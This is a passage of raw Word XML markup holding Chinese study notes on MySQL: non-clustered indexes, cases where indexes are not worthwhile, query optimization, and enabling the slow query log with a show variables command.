        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树的叶结点只是存储了数据的地址，故称为非聚集索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引使用策略及优化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的优化主要分为结构优化（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Scheme optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）和查询优化（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Query optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00043ED8" w:rsidRPr="00F41A4C" w:rsidRDefault="00544BC4" w:rsidP="00895BB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidR="009E05AF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.linuxidc.com/Linux/2014-04/100597.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00043ED8" w:rsidRPr="00F41A4C" w:rsidRDefault="00043ED8" w:rsidP="00895BB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00113C14" w:rsidRPr="00F41A4C" w:rsidRDefault="00113C14" w:rsidP="00113C14">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>哪些情况下不需要索引？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113C14" w:rsidRPr="00F41A4C" w:rsidRDefault="002B58BC" w:rsidP="002B58BC">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表很小的情况下，没有必要使用索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不经常在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Where</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后使用的比较字段</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果表数据需要频繁修改，不建议使用索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果查询返回记录很多，不建议使用索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后含</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IS NULL /IS NOT NULL/ like ‘%</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入符</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等条件，不建议使用索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113C14" w:rsidRPr="00F41A4C" w:rsidRDefault="005E070F" w:rsidP="005E070F">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>那适用情况呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E070F" w:rsidRPr="00F41A4C" w:rsidRDefault="005E070F" w:rsidP="005E070F">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>查询、排序、分组、主键等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620F76" w:rsidRPr="00F41A4C" w:rsidRDefault="00620F76" w:rsidP="006F0BAF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00316511" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r w:rsidR="00316511" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>慢日志查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>慢查询配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>慢查询有什么用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="000459AE">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>它能记录下所有执行超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>long_query_time</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时间的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>帮你找到执行慢的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方便我们对这些</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行优化</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如何开启慢查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>首先我们先查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器的慢查询状态是否开启</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>执行如下命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>show variables like '%quer%';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们可以看到当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>log_slow_queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>状态为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">OFF, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
